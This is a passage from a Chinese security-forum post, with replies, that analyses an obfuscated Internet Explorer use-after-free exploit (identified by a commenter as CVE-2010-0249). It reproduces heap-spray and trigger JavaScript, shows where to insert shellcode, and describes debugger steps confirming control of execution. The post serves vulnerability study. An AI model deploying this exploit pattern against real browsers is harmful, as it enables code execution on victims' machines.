        var uafwHGfWUmxkIam = uKDkvADSMMCpMpWmBjzJRTRBOHuctmWYaRSFYKUgfGAorttjbgqtzbHoZkWlIhITyAOOkvmTpOpLxrfsUWzDUdnsdEwzsu("%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d");
        do {
            uafwHGfWUmxkIam += uafwHGfWUmxkIam
        } while (uafwHGfWUmxkIam.length < 0xd0000);
        for (S = 0; S < 150; S++) 
        {
        JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf[S] = uafwHGfWUmxkIam + mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO;
        }
    }

    function WisgEgTNEfaONekEqaMyAUALLMYW(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz) {
        gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX();
        lTneQKOeMgwvXaqCPyQAaDDYAkd = document.createEventObject(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz);
        document.getElementById("vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY").innerHTML = "";
        window.setInterval(nayjNuSncnxGnhZDJrEXatSDkpo, 50);
    }

    function nayjNuSncnxGnhZDJrEXatSDkpo() {
        p = "\u0c0f\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
        for (i = 0; i < MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul.length; i++) {
            MeExIMbufEWBILnRFpImyxRTWGErClypbeBtzPrAICchTufmJXuziChiul[i].data = p;
        }

        var t = lTneQKOeMgwvXaqCPyQAaDDYAkd.srcElement;
    }
</script>
</head>
<body>
<span id="vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY"><iframe src="/infowTVeeGDYJWNfsrdrvXiYApnuPoCMjRrSZuKtbVgwuZCXwxKjtEclbPuJPPctcflhsttMRrSyxl.gif" onload="WisgEgTNEfaONekEqaMyAUALLMYW(event)" /></span></body></html>
</body>
</html>

我们来分析一下这段代码

 

不是很懂js,但是根据开发经验,我猜测的执行顺序应该是如下(忽略堆喷代码的构建)

  1. 1. onload="WisgEgTNEfaONekEqaMyAUALLMYW(event)"  加载一个对象。

   该函数原型如下:

   WisgEgTNEfaONekEqaMyAUALLMYW(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz)

   该函数内部创建一个Event对象 lTneQKOeMgwvXaqCPyQAaDDYAkd = document.createEventObject(cpznAZhGdtOhTCNSVGLRdYeEfCAPKMeztpQnoKTGKsjrhhkoxCWPz);

2. 通过id获取Element

document.getElementById("vhQYFCtoDnOzUOuxAflDSzVMIHYhjJojAOCHNZtQdlxSPFUeEthCGdRtiIY").innerHTML = "";

   并设定一个回调函数(setInterval() 方法可按照指定的周期(以毫秒计)来调用函数或计算表达式。)

   window.setInterval(nayjNuSncnxGnhZDJrEXatSDkpo, 50);

3. 执行 nayjNuSncnxGnhZDJrEXatSDkpo函数

4. var t = lTneQKOeMgwvXaqCPyQAaDDYAkd.srcElement;

1559372585862

 

到这里我们应该就能联系到一块了

 

因为我们在的模块最终的上层调用为

; CODE XREF: CEventObj::get_srcElement(IHTMLElement * *)+10p

然 js脚本里面最终执行的也是

var t = lTneQKOeMgwvXaqCPyQAaDDYAkd.srcElement;

1559373415611

漏洞的利用

在上面分析中,我们忽略了 堆喷射 代码的构建

 

我们看一下 该函数

gGyfqFvCYPRmXbnUWzBrulnwZVAJpUifKDiAZEKOqNHrfziGDtUOBqjYCtATBhClJkXjezUcmxBlfEX()

1559373764271

 

假设"\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"

 

为我们的shellcode

 

我们做出如下修改即可

JsgdlqtHVnnWiFMCpdxJheQbdjITPhdkurJqwIMuMxJnHf[S] = uafwHGfWUmxkIam+"\u900d\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090" + mWgWGhyqOVxBPqtnAFWAyxhLnqBNaRNnkKvTfAwVuvOyCnGUwBPZEzSZtKpqGZUvPO;

堆喷射的调试

用od打开ie浏览器,并在 0x7E44C4C3 下条件断点 ecx==0x0c0d0c0d

 

F9跑起来,访问我们的html

http://192.168.x.x/index.html?rFfWELUjLJHpP

程序断到下图位置:

 

1559370403996

 

F7步进,发下ecx指向的区域基本全为0x0c0d0c0d(这块区域为滑板指令)

 

1559370508869

 

继续F7,发下call的地址也是 0x0c0d0c0d

 

1559370595263

 

继续F7跟进跟进call,到这里,滑板指令往下就是我们正在的shellcode了

 

1559371760551

 

我们CTRL+B 搜索二进制字符串 90 90 90 90 90,并下断

 

1559373996918

 

F9执行,成功断到此处

 

1559374054009


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
点赞3
打赏
分享
打赏 + 2.00雪花
kanxue
打赏次数 1 雪花 + 2.00
 
赞赏  kanxue   +2.00 2019/06/02 感谢分享~
最新回复 (12)
小胖的小胖胖
雪    币: 10
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
小胖的小胖胖 2019-6-1 16:20
2
0
内容很精彩,虽然很老的看的还是很舒服。
Kalendsi
雪    币: 2170
活跃值: (2354)
能力值: ( LV12,RANK:270 )
在线值:
发帖
回帖
粉丝
私信
Kalendsi 6 2019-6-1 16:26
3
0
分析完,我看网上并没有这个漏洞的分析,所有想给大家分享一下。我甚至都不知道他的CVE编号,老哥你知道吗
niuzuoquan
雪    币: 310
活跃值: (1917)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
niuzuoquan 2019-6-1 21:21
4
0
mark
Editor
雪    币: 17792
活跃值: (60003)
能力值: (RANK:125 )
在线值:
发帖
回帖
粉丝
私信
Editor 2019-6-3 09:23
5
0
感谢分享~mark!
kalikaikai
雪    币: 1899
活跃值: (325)
能力值: ( LV8,RANK:121 )
在线值:
发帖
回帖
粉丝
私信
kalikaikai 1 2019-6-4 13:57
6
0
这漏洞很经典
tearorca
雪    币: 1421
活跃值: (162)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
tearorca 2019-6-10 09:03
8
0
编号是CVE-2010-0249
一半人生
雪    币: 5330
活跃值: (11740)
能力值: ( LV12,RANK:312 )
在线值:
发帖
回帖
粉丝
私信
一半人生 5 2019-6-10 09:08
9
0
有意思的故事从情报开始
最后于 2020-2-13 20:29 被kanxue编辑 ,原因:
tearorca
雪    币: 1421
活跃值: (162)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
tearorca 2019-6-11 11:15
10
0
想问下lz最前面加的这个参数是干什么用的?rFfWELUjLJHpP


最后于 2020-2-17 20:44 被kanxue编辑 ,原因:
Kalendsi
雪    币: 2170
活跃值: (2354)
能力值: ( LV12,RANK:270 )
在线值:
发帖
回帖
粉丝
私信
Kalendsi 6 2019-6-13 08:10
11
0
一滴泪 想问下lz最前面加的这个参数是干什么用的?rFfWELUjLJHpP
解密的key,读取的那个网页是加密的
Kalendsi
雪    币: 2170
活跃值: (2354)
能力值: ( LV12,RANK:270 )
在线值:
发帖
回帖
粉丝
私信
Kalendsi 6 2019-6-13 08:10
12
0
一滴泪 编号是CVE-2010-0249
3Q
一曲沙丶天涯
雪    币: 9
活跃值: (10)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
私信
一曲沙丶天涯 2020-2-26 21:51
13
0

0

最后于 2020-8-18 15:25 被一曲沙丶天涯编辑 ,原因:
游客
登录 | 注册 方可回帖
 回帖  表情 雪币赚取及消费
高级回复
返回